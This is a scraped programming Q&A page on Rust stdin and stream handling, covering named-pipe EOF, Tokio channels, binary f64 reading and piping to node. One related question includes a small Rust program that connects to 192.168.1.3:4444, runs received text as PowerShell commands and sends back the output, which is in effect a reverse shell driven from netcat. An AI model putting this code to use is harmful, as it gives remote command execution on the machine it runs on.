How to implement blocking iterator over stdin? - rust

I need to implement a long-running program that receives messages via stdin. The protocol defines that messages are in form of length indicator (for simplicity 1 byte integer) and then string of a length represented by length indicator. Messages are NOT separated by any whitespace.
The program is expected to consume all messages from stdin and wait for another messages.
How do I implement such waiting on stdin?
I implemented the iterator in a way that it tries to read from stdin and repeats in case of error. It works, but it is very inefficient.
I would like the iterator to read the message when new data comes.
My implementation is using read_exact:
use std::io::{Read, stdin, Error as IOError, ErrorKind};
pub struct In<R>(R) where R: Read;
pub trait InStream{
fn read_one(&mut self) -> Result<String, IOError>;
}
impl <R>In<R> where R: Read{
pub fn new(stdin: R) -> In<R> {
In(stdin)
}
}
impl <R>InStream for In<R> where R: Read{
/// Read one message from stdin and return it as string
fn read_one(&mut self) -> Result<String, IOError>{
const length_indicator: usize = 1;
let stdin = &mut self.0;
let mut size: [u8;length_indicator] = [0; length_indicator];
stdin.read_exact(&mut size)?;
let size = u8::from_be_bytes(size) as usize;
let mut buffer = vec![0u8; size];
let _bytes_read = stdin.read_exact(&mut buffer);
String::from_utf8(buffer).map_err(|_| IOError::new(ErrorKind::InvalidData, "not utf8"))
}
}
impl <R>Iterator for In<R> where R:Read{
type Item = String;
fn next(&mut self) -> Option<String>{
self.read_one()
.ok()
}
}
fn main(){
let mut in_stream = In::new(stdin());
loop{
match in_stream.next(){
Some(x) => println!("x: {:?}", x),
None => (),
}
}
}
I went trough Read and BufReader documentation, but none method seems to solve my problem as read doc contains following text:
This function does not provide any guarantees about whether it blocks waiting for data, but if an object needs to block for a read and cannot, it will typically signal this via an Err return value.
How do I implement waiting for data on stdin?
===
Edit: minimum use-case that does not block and loops giving UnexpectedEof error instead of waiting for data:
use std::io::{Read, stdin};
fn main(){
let mut stdin = stdin();
let mut stdin_handle = stdin.lock();
loop{
let mut buffer = vec![0u8; 4];
let res = stdin_handle.read_exact(&mut buffer);
println!("res: {:?}", res);
println!("buffer: {:?}", buffer);
}
I run it on OSX by cargo run < in where in is named pipe. I fill the pipe by echo -n "1234" > in.
It waits for the first input and then it loops.
res: Ok(())
buffer: [49, 50, 51, 52]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
buffer: [0, 0, 0, 0]
res: Err(Error { kind: UnexpectedEof, message: "failed to fill whole buffer" })
...
I would like the program to wait until there is sufficient data to fill the buffer.

As others explained, the docs on Read are written very generally and don't apply to standard input, which is blocking. In other words, your code with the buffering added is fine.
The problem is how you use the pipe. For example, if you run mkfifo foo; cat <foo in one shell, and echo -n bla >foo in another, you'll see that the cat in the first shell will display foo and exit. That closing the last writer of the pipe sends EOF to the reader, rendering your program's stdin useless.
You can work around the issue by starting another program in the background that opens the pipe in write mode and never exits, for example tail -f /dev/null >pipe-filename. Then echo -n bla >foo will be observed by your program, but won't cause its stdin to close. The "holding" of the write end of the pipe could probably also be achieved from Rust as well.

Related

How to remove nul characters from string in rust?

use std::net::TcpStream;
use std::io::*;
use std::io::{self, Write};
use std::str::from_utf8;
use std::process::Command;
const MESSAGE_SIZE: usize = 10;
fn main()
{
let mut stream = TcpStream::connect("192.168.1.3:4444").unwrap();
println!("CONNECTED !!");
loop
{
stream.write(b"[*] >> ").expect("A");
let mut rx_bytes = [0u8; MESSAGE_SIZE];
stream.read(&mut rx_bytes).expect("k");
let received = from_utf8(&rx_bytes).expect("valid utf8").to_string();
print!("{}",received);
let output = Command::new("powershell").arg(received).output().expect("failed to execute process"); // Error at .arg(received).
println!("status: {}", output.status);
io::stdout().write_all(&output.stdout).unwrap();
io::stderr().write_all(&output.stderr).unwrap();
let res = from_utf8(&output.stdout).expect("valid utf8").to_string();
stream.write(res.as_bytes());
}
}
ERROR:-
thread 'main' panicked at 'failed to execute process: Error { kind: InvalidInput, message: "nul byte found in provided data" }', .\main.rs:20:72
note: run with RUST_BACKTRACE=1 environment variable to display a backtrace
PS:- I am using netcat as the server.
The first thing you should probably do (if you haven't already) is to look at your incoming data:
println!("{:x?}", "azAZ\0X09".as_bytes()); // [61, 7a, 41, 5a, 0, 58, 30, 39]
Then you can determine why there is a null byte in there and what needs to be done about it.

Rust Tokio mpsc::channel unexpected behavior for multi-task program

In the following program I use Tokio's mpsc channels. The Sender is moved to a task named input_message and the Receiver is moved to another task named printer. Both tasks are tokio::spawn()-ed in the main function. The input_message task is to read the user's input and send it through a Channel. The printer task recv() on the channel to get the user's input and simply prints it to stdout:
use std::error::Error;
use tokio::sync::mpsc;
use std::io::{BufRead, Write};
#[tokio::main]
async fn main() -> Result<(), Box<dyn Error>> {
let (tx, mut rx) = mpsc::unbounded_channel::<String>();
let printer = tokio::spawn(async move {
loop {
let res = rx.recv().await; // (11) Comment this ..
// let res = rx.try_recv(); // (12) Uncomment this ,,
if let Some(m) = res { // .. and this
// if let Ok(m) = res { // ,, and this
if m.trim() == "q".to_string() {
break;
}
println!("Received: {}", m.trim());
}
}
println!("Printer exited");
});
let input_message = tokio::spawn(async move {
let stdin = std::io::stdin();
let mut bufr = std::io::BufReader::new(stdin);
let mut buf = String::new();
loop {
// Let the printer thread print the string before asking the user's input.
std::thread::sleep(std::time::Duration::from_millis(1));
print!("Enter input: ");
std::io::stdout().flush().unwrap();
bufr.read_line(&mut buf).unwrap();
if buf.trim() == "q".to_string() {
tx.send(buf).unwrap();
break;
}
tx.send(buf).unwrap();
buf = String::new();
}
println!("InputMessage exited");
});
tokio::join!(input_message, printer);
Ok(())
}
The expected behavior of the program is to:
Ask the user a random input (q to quit)
Print that same input to stdout
Using rx.recv().await as in line 11-13 the program seems to buffer the Strings representing the user's input: the various inputs are not received by the printer task that therefore does not print the strings to stdout. Once the quit message (i.e. q) is sent, the input_message task exits and the messages seems to be flushed out of the channel and the receiver processes them all at once, and so the printer task prints all the inputs at once. Here's an example of wrong output:
Enter input: Hello
Enter input: World
Enter input: q
InputMessage exited
Received: Hello
Received: World
Printer exited
My question here is, how is it possible that the channel buffers the messages and processes them in one go only when the sending thread exits, instead of receiving them as they are sent?
What I tried to do is to use the try_recv() function as in line 12-14 and indeed it fixes the problem. The output is correctly printed, here is an example:
Enter input: Hello
Received: Hello
Enter input: World
Received: World
Enter input: q
InputMessage exited
Printer exited
In light of this, I get confused. I get the difference between the recv().await and the try_recv() functions but I think there's something more in this case that I'm ignoring that makes the latter work and the former not work. Is anybody able to shed some light and elaborate on this? Why does try_recv() work and recv().await not, and why should recv().await not work in this scenario? In terms of efficiency is looping on try_recv() bad or "bad practice" at all?
There are a few things to point out here, but first of all, you are waiting for lines on std::io::stdin() which blocks the thread until a line arrives on that stream. While the thread waiting for input, no other future can be executed on this thread, this blog post is a great resource if you want to dive deeper why you shouldn't do that.
Tokio's io module offers an async handle to stdin(), you can work with this as a quick fix, although the documentation explicitly mentions that you should spin up a dedicated (non-async) thread for interactive user input instead of using the async handle.
Swapping std::io::stdin() for tokio::io::stdin() also entails swapping out the standard library BufReader for tokio's implementation that wraps an R: AsyncRead rather than R: Read.
To prevent interleaved writes between the input task and the output task, you can use a responder channel that signals to the input task when the output has been printed. Instead of sending String over the channel, you could send a Message with these fields:
struct Message {
payload: String,
done_tx: oneshot::Sender<()>,
}
After reading an input line, send the Message over the channel to the printer task. The printer task prints the String and signals through the done_tx that the input task can print the input prompt and wait for a new line.
Putting all that together with some other changes like a while loop to wait for messages, you'd end up with something like this:
use std::error::Error;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use tokio::sync::{mpsc, oneshot};
#[derive(Debug)]
struct Message {
done_tx: oneshot::Sender<()>,
message: String,
}
#[tokio::main]
async fn main() -> Result<(), Box<dyn Error>> {
let (tx, mut rx) = mpsc::unbounded_channel::<Message>();
let printer = tokio::spawn(async move {
while let Some(Message {
message: m,
done_tx,
}) = rx.recv().await
{
if m.trim() == "q".to_string() {
break;
}
println!("Received: {}", m.trim());
done_tx.send(()).unwrap();
}
println!("Printer exited");
});
let input_message = tokio::spawn(async move {
let stdin = tokio::io::stdin();
let mut stdout = tokio::io::stdout();
let mut bufr = tokio::io::BufReader::new(stdin);
let mut buf = String::new();
loop {
// Let the printer thread print the string before asking the user's input.
stdout.write(b"Enter input: ").await.unwrap();
stdout.flush().await.unwrap();
bufr.read_line(&mut buf).await.unwrap();
let end = buf.trim() == "q";
let (done_tx, done) = oneshot::channel();
let message = Message {
message: buf,
done_tx,
};
tx.send(message).unwrap();
if end {
break;
}
done.await.unwrap();
buf = String::new();
}
println!("InputMessage exited");
});
tokio::join!(input_message, printer);
Ok(())
}

Read binary file in units of f64 in Rust

Assuming you have a binary file example.bin and you want to read that file in units of f64, i.e. the first 8 bytes give a float, the next 8 bytes give a number, etc. (assuming you know endianess) How can this be done in Rust?
I know that one can use std::fs::read("example.bin") to get a Vec<u8> of the data, but then you have to do quite a bit of "gymnastics" to convert always 8 of the bytes to a f64, i.e.
fn eight_bytes_to_array(barry: &[u8]) -> &[u8; 8] {
barry.try_into().expect("slice with incorrect length")
}
let mut file_content = std::fs::read("example.bin").expect("Could not read file!");
let nr = eight_bytes_to_array(&file_content[0..8]);
let nr = f64::from_be_bytes(*nr_dp_per_spectrum);
I saw this post, but its from 2015 and a lot of changes have happend in Rust since then, so I was wondering if there is a better/faster way these days?
Example without proper error handling and checking for cases when file contains not divisible amount of bytes.
use std::fs::File;
use std::io::{BufReader, Read};
fn main() {
// Using BufReader because files in std is unbuffered by default
// And reading by 8 bytes is really bad idea.
let mut input = BufReader::new(
File::open("floats.bin")
.expect("Failed to open file")
);
let mut floats = Vec::new();
loop {
use std::io::ErrorKind;
// You may use 8 instead of `size_of` but size_of is less error-prone.
let mut buffer = [0u8; std::mem::size_of::<f64>()];
// Using read_exact because `read` may return less
// than 8 bytes even if there are bytes in the file.
// This, however, prevents us from handling cases
// when file size cannot be divided by 8.
let res = input.read_exact(&mut buffer);
match res {
// We detect if we read until the end.
// If there were some excess bytes after last read, they are lost.
Err(error) if error.kind() == ErrorKind::UnexpectedEof => break,
// Add more cases of errors you want to handle.
_ => {}
}
// You should do better error-handling probably.
// This simply panics.
res.expect("Unexpected error during read");
// Use `from_be_bytes` if numbers in file is big-endian
let f = f64::from_le_bytes(buffer);
floats.push(f);
}
}
I would create a generic iterator that returns f64 for flexibility and reusability.
struct F64Reader<R: io::BufRead> {
inner: R,
}
impl<R: io::BufRead> F64Reader<R> {
pub fn new(inner: R) -> Self {
Self{
inner
}
}
}
impl<R: io::BufRead> Iterator for F64Reader<R> {
type Item = f64;
fn next(&mut self) -> Option<Self::Item> {
let mut buff: [u8; 8] = [0;8];
self.inner.read_exact(&mut buff).ok()?;
Some(f64::from_be_bytes(buff))
}
}
This means if the file is large, you can loop through the values without storing it all in memory
let input = fs::File::open("example.bin")?;
for f in F64Reader::new(io::BufReader::new(input)) {
println!("{}", f)
}
Or if you want all the values you can collect them
let input = fs::File::open("example.bin")?;
let values : Vec<f64> = F64Reader::new(io::BufReader::new(input)).collect();

Writing to stdio & reading from stdout in Rust Command process

I'll try to simplify as much as possible what I'm trying to do accomplish but in a nutshell here is my problem:
I am trying to spawn the node shell as a process in Rust. I would like to pass to the process' stdin javascript code and read the nodejs output from stdout of the process. This would be an interactive usage where the node shell is spawned and keeps receiving JS instructions and executing them.
I do not wish to launch the nodejs app using a file argument.
I have read quite a bit about std::process::Command, tokio and why we can't write and read to a piped input using standard library. One of the solutions that I kept seeing online (in order to not block the main thread while reading/writing) is to use a thread for reading the output. Most solutions did not involve a continuous write/read flow.
What I have done is to spawn 2 threads, one that keeps writing to stdin and one that keeps reading from stdout. That way, I thought, I won't be blocking the main thread. However my issue is that only 1 thread can actively be used. When I have a thread for stdin, stdout does not even receive data.
Here is the code, comments should provide more details
pub struct Runner {
handle: Child,
pub input: Arc<Mutex<String>>,
pub output: Arc<Mutex<String>>,
input_thread: JoinHandle<()>,
output_thread: JoinHandle<()>,
}
impl Runner {
pub fn new() -> Runner {
let mut handle = Command::new("node")
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.spawn()
.expect("Failed to spawn node process!");
// begin stdout thread part
let mut stdout = handle.stdout.take().unwrap();
let output = Arc::new(Mutex::new(String::new()));
let out_clone = Arc::clone(&output);
let output_thread = spawn(move || loop {
// code here never executes...why ?
let mut buf: [u8; 1] = [0];
let mut output = out_clone.lock().unwrap();
let what_i_read = stdout.read(&mut buf);
println!("reading: {:?}", what_i_read);
match what_i_read {
Err(err) => {
println!("{}] Error reading from stream: {}", line!(), err);
break;
}
Ok(bytes_read) => {
if bytes_read != 0 {
let char = String::from_utf8(buf.to_vec()).unwrap();
output.push_str(char.as_str());
} else if output.len() != 0 {
println!("result: {}", output);
out_clone.lock().unwrap().clear();
}
}
}
});
// begin stdin thread block
let mut stdin = handle.stdin.take().unwrap();
let input = Arc::new(Mutex::new(String::new()));
let input_clone = Arc::clone(&input);
let input_thread = spawn(move || loop {
let mut in_text = input_clone.lock().unwrap();
if in_text.len() != 0 {
println!("writing: {}", in_text);
stdin.write_all(in_text.as_bytes()).expect("!write");
stdin.write_all("\n".as_bytes()).expect("!write");
in_text.clear();
}
});
Runner {
handle,
input,
output,
input_thread,
output_thread,
}
}
// this function should receive commands
pub fn execute(&mut self, str: &str) {
let input = Arc::clone(&self.input);
let mut input = input.lock().unwrap();
input.push_str(str);
}
}
In the main thread I'd like use this as
let mut runner = Runner::new();
runner.execute("console.log('foo'");
println!("{:?}", runner.output);
I am still new to Rust but at least I passed the point where the borrow checker makes me bang my head against the wall, I am starting to find it more pleasing now :)

Reading Bytes From a Reader

I'm writing something to process stdin in blocks of bytes, but can't seem to work out a simple way to do it (though I suspect there is one).
fn run() -> int {
// Doesn't compile: types differ
let mut buffer = [0, ..100];
loop {
let block = match stdio::stdin().read(buffer) {
Ok(bytes_read) => buffer.slice_to(bytes_read),
// This captures the Err from the end of the file,
// but also actual errors while reading from stdin.
Err(message) => return 0
};
process(block).unwrap();
}
}
fn process(block: &[u8]) -> Result<(), IoError> {
// do things
}
My questions:
What's the "standard" way to do this? (I've been trying/hoping to use and_then()/or_else())
How can I differentiate between the Err(IoError) from end of the file, and the Err that's actually an error?
The previously accepted answer was outdated (Rust v1.0). EOF is no longer considered an error. You can do it like this:
use std::io::{self, Read};
fn main() {
let mut buffer = [0; 100];
while let Ok(bytes_read) = io::stdin().read(&mut buffer) {
if bytes_read == 0 { break; }
process(&buffer[..bytes_read]).unwrap();
}
}
fn process(block: &[u8]) -> Result<(), io::Error> {
Ok(()) // do things
}
Note that this may not result in the expected behavior: read doesn't have to fill the buffer, but may return with any number of bytes read. In the case of stdin the read implementation returns every time a newline is detected (pressing enter in terminal).
Rust API documentation states that:
Note that end-of-file is considered an error, and can be inspected for
in the error's kind field.
The IoError struct looks like this:
pub struct IoError {
pub kind: IoErrorKind,
pub desc: &'static str,
pub detail: Option<String>,
}
The list is all kinds is at http://doc.rust-lang.org/std/io/enum.IoErrorKind.html
You can match it like this:
match stdio::stdin().read(buffer) {
Ok(_) => println!("ok"),
Err(io::IoError{kind:io::EndOfFile, ..}) => println!("end of file"),
_ => println!("error")
}

Resources